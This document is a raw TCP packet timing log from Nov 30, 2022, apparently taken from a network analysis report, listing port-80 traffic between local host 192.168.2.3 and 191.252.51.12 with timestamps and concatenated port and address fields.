                                                  Nov 30, 2022 00:37:10.541495085 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541497946 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541522026 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541531086 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541544914 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541551113 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541568041 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541589975 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541589975 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541611910 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541634083 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541646957 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541656017 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541678905 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541685104 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541702032 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541723967 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541727066 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541748047 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541769981 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541770935 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541791916 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541814089 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541824102 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541836023 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541858912 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541858912 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541882038 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541903973 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541927099 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541934967 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541949034 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.541970015 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.541981936 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542004108 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542026997 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542027950 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542049885 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542068958 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542073011 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542094946 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542103052 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542119026 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542139053 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542154074 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542175055 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542196989 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542217016 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542218924 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542239904 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542241096 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542263985 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542284966 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542306900 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542309046 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542329073 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542339087 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542351007 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542372942 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542376041 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542396069 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542413950 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542418003 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542440891 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542460918 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542463064 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542485952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542500019 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542507887 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542529106 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542541981 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542551994 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542573929 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542588949 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542596102 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542618036 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542630911 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542639971 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542664051 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542675018 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542685986 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542707920 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542721033 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542731047 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542754889 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542773008 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542781115 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542804003 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542817116 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542826891 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542849064 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542861938 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542871952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542916059 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542922020 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542938948 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542962074 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.542973995 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.542984962 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543009043 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543025017 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543031931 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543055058 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543076992 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543088913 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543098927 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543122053 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543129921 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543144941 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543167114 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543175936 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543189049 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543212891 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543234110 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543235064 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543258905 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543271065 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543282032 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543303967 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543306112 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543328047 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543349028 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543349981 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543370962 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543392897 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543400049 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543414116 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543436050 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543437004 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543458939 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543479919 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543484926 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543503046 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543521881 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.543524981 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.543572903 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.575905085 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.611594915 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611643076 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611663103 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611681938 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611701965 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611721992 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611742973 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611762047 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611783028 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611789942 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.611803055 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611821890 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611841917 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611860037 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611871004 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.611880064 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611896992 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.611898899 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611917973 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611937046 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611957073 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611960888 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.611974955 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.611989975 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.611994028 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612013102 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612013102 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612031937 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612052917 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612067938 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612071037 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612088919 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612097025 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612108946 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612119913 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612127066 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612160921 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612171888 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612179041 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612198114 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612209082 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612217903 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612236023 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612253904 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612263918 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612273932 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612292051 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612294912 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612310886 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612329006 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612332106 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612350941 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612370014 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612381935 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612387896 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612401009 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612412930 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612431049 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612448931 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612454891 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612467051 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612484932 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612489939 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612504959 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612513065 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612524033 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612543106 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612561941 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612572908 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612581968 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612601042 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612601995 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612621069 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612637997 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612639904 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612658024 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612672091 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612678051 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612696886 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612715006 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612720013 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612734079 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612744093 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612754107 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612772942 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612782001 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612791061 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612809896 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612827063 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612828016 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612847090 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612864017 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612864971 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612883091 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612884998 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612901926 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612921000 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612921000 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612940073 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612957954 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612966061 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.612977982 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.612997055 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613003016 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613014936 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613034010 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613049030 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613050938 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613070011 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613090038 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613090038 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613110065 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613118887 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613131046 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613149881 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613166094 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613168001 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613183975 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613185883 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613205910 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613223076 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613234997 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613240957 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613260031 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613261938 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613279104 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613296986 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613315105 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613318920 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613334894 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613339901 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613353014 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613370895 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613373995 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613390923 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613408089 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613426924 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613429070 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613445044 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613456011 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613465071 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613483906 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613490105 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613502026 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613519907 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613522053 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613538980 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613557100 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613568068 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613575935 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613598108 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613610029 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613617897 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613636971 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613639116 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613655090 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613672972 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613686085 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613691092 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613709927 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613714933 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613729000 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613748074 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613750935 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613766909 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613785982 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613797903 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613804102 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613822937 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.613831997 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.613867044 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.630743980 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755398989 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755435944 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755454063 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755471945 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755491972 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755511045 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755528927 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755541086 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755547047 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755564928 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755584002 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755584002 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755600929 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755603075 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755620956 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755637884 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755651951 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755655050 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755671978 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755686045 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755693913 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755698919 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755712986 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755726099 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755742073 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755754948 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755768061 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755780935 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755784988 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.755794048 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.755808115 CET8049698191.252.51.12192.168.2.3
